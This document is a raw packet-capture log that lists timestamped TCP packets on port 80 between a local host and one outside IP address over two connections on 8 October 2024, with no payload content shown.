Oct 8, 2024 11:32:04.958605051 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.958606958 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958623886 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958635092 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958646059 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958658934 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958668947 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958679914 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958689928 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958700895 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958707094 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.958736897 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.958736897 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.958755016 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958765030 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958775043 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958781004 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958791018 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958802938 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958815098 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958827019 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958837032 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958848000 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958851099 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.958858967 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958913088 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.958925009 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958942890 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958955050 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958966017 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958966970 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.958976984 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958990097 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.959001064 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.959003925 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.959012032 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.959023952 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.959412098 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.959412098 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.962033987 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.962045908 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.962057114 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.962068081 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.962078094 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.962089062 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.962100029 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.962110043 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.962145090 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.962218046 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:05.048235893 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:05.049098015 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:05.232443094 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:08.684344053 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:15.520761967 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:15.525840998 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:15.525923014 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:15.526119947 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:15.530946970 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.125422955 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.125555992 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.125569105 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.125582933 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.125596046 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.125597954 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.125610113 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.125622988 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.125627041 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.125637054 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.125649929 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.125663042 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.125663996 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.125675917 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.125699043 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.130549908 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.130562067 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.130567074 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.130629063 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.216190100 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.216213942 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.216223955 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.216288090 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.216298103 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.216306925 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.216309071 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.216351032 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.216695070 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.216703892 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.216712952 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.216726065 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.216733932 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.216742039 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.216746092 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.216767073 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.216789007 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.217638969 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.217649937 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.217669010 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.217679024 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.217685938 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.217689037 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.217699051 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.217711926 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.217736006 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.218595982 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.218611956 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.218621016 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.218653917 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.218674898 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.218684912 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.218725920 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.221198082 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.221249104 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.306653023 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.306679010 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.306719065 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.306744099 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.306778908 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.306791067 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.306808949 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.306822062 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.306833982 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.306839943 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.306853056 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.306889057 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.307035923 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.307087898 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.307087898 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.307100058 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.307147980 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.307152033 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.307157993 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.307168961 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.307179928 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.307193995 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.307209015 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.307209969 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.307223082 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.307229042 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.307234049 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.307249069 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.307282925 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.307965040 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.308120012 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.308130026 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.308140039 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.308150053 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.308161020 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.308166027 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.308176994 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.308182955 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.308188915 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.308199883 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.308207035 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.308212042 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.308223963 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.308249950 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.308892965 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.308902979 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.308912039 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.308928967 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.308937073 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.308945894 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.308950901 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.308984995 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.308984995 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.309315920 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.309354067 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.309370041 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.309380054 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.309390068 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.309392929 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.309398890 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.309406042 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.309417963 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.309420109 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.309427023 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.309432030 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.309438944 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.309483051 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.397151947 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.397202015 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.397212982 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.397222996 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.397242069 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.397258043 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.397285938 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.397300005 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.397310019 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.397351027 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.397367954 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.397377968 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.397387981 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.397396088 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.397413969 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.397437096 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.397610903 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.397627115 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.397655964 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.397691011 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.397701025 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.397732019 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.397850037 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.397861004 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.397870064 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.397902012 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.397933006 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.397978067 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.397986889 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.397996902 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.398005962 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.398019075 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.398051023 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.398241997 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.398252010 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.398260117 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.398297071 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.398308039 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.398314953 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.398318052 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.398328066 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.398334980 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.398360968 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.398390055 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.398400068 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.398410082 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.398416042 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.398425102 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.398425102 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.398431063 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.398442984 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.398489952 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.399061918 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.399071932 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.399082899 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.399091005 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.399095058 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.399101019 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.399111032 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.399116993 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.399121046 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.399158955 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.399179935 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.399183035 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.399189949 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.399199009 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.399209023 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.399219036 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.399224997 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.399229050 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.399240017 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.399240017 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.399249077 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.399259090 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.399260998 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.399271011 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.399282932 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.399326086 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.400022984 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.400221109 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.400234938 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.400244951 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.400253057 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.400262117 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.400270939 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.400275946 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.400281906 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.400290966 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.400300980 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.400300980 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.400310040 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.400320053 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.400321007 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.400330067 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.400335073 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.400340080 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.400347948 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.400348902 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.400357962 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.400367975 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.400383949 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.400428057 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.401009083 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.401019096 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.401029110 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.401037931 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.401047945 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.401062965 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.401072979 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.401081085 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.401087999 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.401102066 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.450655937 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.487940073 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.487972021 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.487981081 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488034964 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.488048077 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488058090 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488085032 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488095045 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488106966 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.488123894 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488145113 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.488159895 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.488173008 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488182068 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488200903 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488231897 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.488262892 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488272905 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488305092 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488312960 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.488347054 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.488413095 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488421917 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488432884 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488441944 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488451958 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488462925 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488475084 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.488512993 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.488539934 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488549948 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488559008 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488568068 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488576889 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488586903 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.488586903 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488596916 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488603115 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.488606930 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488616943 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.488626003 CEST	80	50004	63.250.38.167	192.168.2.6
